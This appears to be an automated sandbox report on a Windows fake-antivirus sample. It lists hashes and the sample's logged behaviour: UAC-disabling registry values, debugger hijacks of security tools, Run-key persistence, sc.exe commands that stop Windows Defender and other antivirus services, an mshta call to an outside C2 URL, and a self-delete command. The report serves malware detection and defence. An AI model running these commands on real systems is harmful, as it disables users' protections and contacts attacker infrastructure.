Analysis
-
max time kernel
150s -
max time network
167s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 07:26
Static task
static1
Behavioral task
behavioral1
Sample
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
Resource
win10v2004-20220812-en
General
-
Target
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
-
Size
2.7MB
-
MD5
25543861ba274d232c398bc842057def
-
SHA1
72fead8c6e44aade2f1f7df53a59d2258bdbc3d7
-
SHA256
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
-
SHA512
03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
-
SSDEEP
49152:1b2JAKeNCqs5pTNkRLq7J7EzlbCFKmoeBbUkoqypczICPk:1bIAKeNCrtkFMJ7glbqIeBbUZHC
Malware Config
Extracted
http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1
Signatures
-
Processes:
Protector-hcbi.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-hcbi.exe -
Disables taskbar notifications via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
Protector-hcbi.exepid process 1328 Protector-hcbi.exe -
Sets file execution options in registry 2 TTPs 64 IoCs
Processes:
Protector-hcbi.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[4].exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SoftSafeness.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vcsetup.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intdel.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trojantrap3.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luau.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcproxy.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utpost.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusutilities.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\optimize.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnotify.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nsupdate.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwinst4.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavproxy.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\popscan.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atguard.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avptc32.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exe.avxw.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prizesurfer.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wfindv32.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winupdate.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAhlp.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-agnt95.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmavsp.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEShow.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\etrustcipe.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oasrv.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PC_Antispyware2010.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fast.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\normist.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashLogV.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiadmin.exe\Debugger = "svchost.exe" Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavcl.exe\Debugger = "svchost.exe" Protector-hcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe\Debugger = "svchost.exe" Protector-hcbi.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 2 IoCs
Processes:
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exepid process 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Protector-hcbi.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-hcbi.exe" Protector-hcbi.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run Protector-hcbi.exe -
Processes:
Protector-hcbi.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hcbi.exe -
Drops file in System32 directory 3 IoCs
Processes:
Protector-hcbi.exedescription ioc process File opened for modification C:\Windows\SysWOW64\services.msc Protector-hcbi.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-hcbi.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-hcbi.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1984 sc.exe 1968 sc.exe 272 sc.exe 1700 sc.exe 1120 sc.exe 1032 sc.exe 1508 sc.exe 1072 sc.exe 1312 sc.exe 1928 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exeProtector-hcbi.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main Protector-hcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-hcbi.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Protector-hcbi.exepid process 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exedescription pid process Token: SeDebugPrivilege 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe Token: SeDebugPrivilege 1328 Protector-hcbi.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Protector-hcbi.exepid process 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Protector-hcbi.exepid process 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exepid process 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe 1328 Protector-hcbi.exe -
Suspicious use of WriteProcessMemory 52 IoCs
Processes:
9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exeProtector-hcbi.exedescription pid process target process PID 1748 wrote to memory of 1328 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe Protector-hcbi.exe PID 1748 wrote to memory of 1328 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe Protector-hcbi.exe PID 1748 wrote to memory of 1328 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe Protector-hcbi.exe PID 1748 wrote to memory of 1328 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe Protector-hcbi.exe PID 1748 wrote to memory of 1720 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe cmd.exe PID 1748 wrote to memory of 1720 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe cmd.exe PID 1748 wrote to memory of 1720 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe cmd.exe PID 1748 wrote to memory of 1720 1748 9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe cmd.exe PID 1328 wrote to memory of 1772 1328 Protector-hcbi.exe mshta.exe PID 1328 wrote to memory of 1772 1328 Protector-hcbi.exe mshta.exe PID 1328 wrote to memory of 1772 1328 Protector-hcbi.exe mshta.exe PID 1328 wrote to memory of 1772 1328 Protector-hcbi.exe mshta.exe PID 1328 wrote to memory of 1120 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1120 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1120 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1120 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1032 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1032 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1032 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1032 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1984 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1984 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1984 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1984 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1508 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1508 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1508 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1508 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1968 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1968 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1968 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1968 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1072 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1072 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1072 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1072 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1928 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1928 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1928 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1928 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1312 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1312 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1312 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1312 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 272 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 272 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 272 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 272 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1700 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1700 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1700 1328 Protector-hcbi.exe sc.exe PID 1328 wrote to memory of 1700 1328 Protector-hcbi.exe sc.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
Protector-hcbi.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-hcbi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-hcbi.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe"C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exeC:\Users\Admin\AppData\Roaming\Protector-hcbi.exe2⤵
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1328 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1"3⤵
- Modifies Internet Explorer settings
PID:1772 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:1120 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1032 -
C:\Windows\SysWOW64\sc.exesc stop msmpsvc3⤵
- Launches sc.exe
PID:1984 -
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:1508 -
C:\Windows\SysWOW64\sc.exesc stop AntiVirService3⤵
- Launches sc.exe
PID:1072 -
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled3⤵
- Launches sc.exe
PID:1968 -
C:\Windows\SysWOW64\sc.exesc stop GuardX3⤵
- Launches sc.exe
PID:272 -
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled3⤵
- Launches sc.exe
PID:1312 -
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled3⤵
- Launches sc.exe
PID:1928 -
C:\Windows\SysWOW64\sc.exesc config GuardX start= disabled3⤵
- Launches sc.exe
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\954301~1.EXE" >> NUL2⤵PID:1720
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exeFilesize
2.7MB
MD525543861ba274d232c398bc842057def
SHA172fead8c6e44aade2f1f7df53a59d2258bdbc3d7
SHA2569543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
SHA51203ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
-
C:\Users\Admin\AppData\Roaming\Protector-hcbi.exeFilesize
2.7MB
MD525543861ba274d232c398bc842057def
SHA172fead8c6e44aade2f1f7df53a59d2258bdbc3d7
SHA2569543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
SHA51203ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
-
\Users\Admin\AppData\Roaming\Protector-hcbi.exeFilesize
2.7MB
MD525543861ba274d232c398bc842057def
SHA172fead8c6e44aade2f1f7df53a59d2258bdbc3d7
SHA2569543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
SHA51203ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
-
\Users\Admin\AppData\Roaming\Protector-hcbi.exeFilesize
2.7MB
MD525543861ba274d232c398bc842057def
SHA172fead8c6e44aade2f1f7df53a59d2258bdbc3d7
SHA2569543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad
SHA51203ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2
-
memory/272-85-0x0000000000000000-mapping.dmp
-
memory/1032-78-0x0000000000000000-mapping.dmp
-
memory/1072-82-0x0000000000000000-mapping.dmp
-
memory/1120-77-0x0000000000000000-mapping.dmp
-
memory/1312-84-0x0000000000000000-mapping.dmp
-
memory/1328-93-0x00000000052D0000-0x00000000052E0000-memory.dmpFilesize
64KB
-
memory/1328-98-0x0000000005930000-0x0000000005942000-memory.dmpFilesize
72KB
-
memory/1328-95-0x00000000057B0000-0x00000000057C6000-memory.dmpFilesize
88KB
-
memory/1328-94-0x00000000052E0000-0x00000000052ED000-memory.dmpFilesize
52KB
-
memory/1328-70-0x00000000001B0000-0x00000000001B6000-memory.dmpFilesize
24KB
-
memory/1328-73-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1328-97-0x00000000053E0000-0x00000000053EE000-memory.dmpFilesize
56KB
-
memory/1328-96-0x00000000057E0000-0x000000000581B000-memory.dmpFilesize
236KB
-
memory/1328-76-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1328-99-0x0000000005C01000-0x0000000006AAD000-memory.dmpFilesize
14.7MB
-
memory/1328-88-0x0000000004FC0000-0x000000000501F000-memory.dmpFilesize
380KB
-
memory/1328-87-0x0000000004500000-0x0000000004FBA000-memory.dmpFilesize
10.7MB
-
memory/1328-63-0x0000000000000000-mapping.dmp
-
memory/1328-92-0x0000000005380000-0x00000000053DA000-memory.dmpFilesize
360KB
-
memory/1328-89-0x0000000005240000-0x000000000528F000-memory.dmpFilesize
316KB
-
memory/1508-80-0x0000000000000000-mapping.dmp
-
memory/1700-86-0x0000000000000000-mapping.dmp
-
memory/1720-66-0x0000000000000000-mapping.dmp
-
memory/1748-58-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1748-55-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
memory/1748-56-0x0000000000400000-0x000000000073B000-memory.dmpFilesize
3.2MB
-
